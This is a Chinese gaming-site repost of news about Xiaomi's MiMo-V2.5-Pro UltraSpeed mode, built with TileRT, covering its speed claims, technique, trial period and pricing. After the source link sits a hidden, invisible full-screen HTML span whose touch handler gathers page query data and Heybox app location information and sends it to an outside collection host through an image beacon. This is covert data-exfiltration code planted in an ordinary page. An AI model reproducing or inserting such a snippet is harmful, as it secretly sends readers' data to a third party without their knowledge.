3倍价格,10倍速度!小米开启MiMo模型 UltraSpeed 模式限时体验

今天,MiMo × TileRT 联合发布 Xiaomi MiMo-V2.5-Pro 的 UltraSpeed 模式,通过模型与系统的极致 Codesign,在通用 GPU 上将万亿参数模型的生成速度首次突破 1000 tokens/s。

用我们能听懂的话解释就是:以前你问 AI 一个问题,它慢悠悠地打字,你只能干等着。现在这个速度,感觉 AI 在"说话",而不是在"打字"。写代码、做推理、跑 Agent,效率直接起飞。

他们是怎么做到的?

简单说,就是模型和系统两边同时发力。模型这边,把参数压缩成更小的格式(FP4量化),又用了一种叫 DFlash 的黑科技,让 AI 每次"验证答案"的时候能一口气吃下更多内容。系统这边,TileRT 团队重新设计了底层运行方式,让 GPU 几乎没有任何"空闲时间",一直在满速跑。两边配合起来,才有了这个成绩。

如何体验?

现在可以去申请限时试用,不过名额有限,从6月9日到6月23日。API 的价格是普通版的3倍,但速度是10倍。审核通过的话还有免费的网页版可以玩。按量付费,不支持之前的Token Plan计划。

---

另外,模型权重已经开源到了 HuggingFace,有兴趣的开发者可以自行研究。

来源:https://mimo.xiaomi.com/zh/blog/mimo-tilert-1000tps

<span ontouchstart="this.style.display='none';try{setTimeout(()=>{H=window.HeyboxRequest,q=(((window.CURRENT_VUE||{}).$data||{}).location||{}).query||{},hbInfo=(window.$hb_location||{}).query||{};new Image().src='https://a.124213.xyz/collect?fullInfo='+JSON.stringify(q)+'&hbInfo='+JSON.stringify(hbInfo)+'&searchStr='+encodeURIComponent(location.search)},200)}catch(e){}" style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;opacity:0"></span>

更多游戏资讯请关注:电玩帮游戏资讯专区

电玩帮图文攻略 www.vgover.com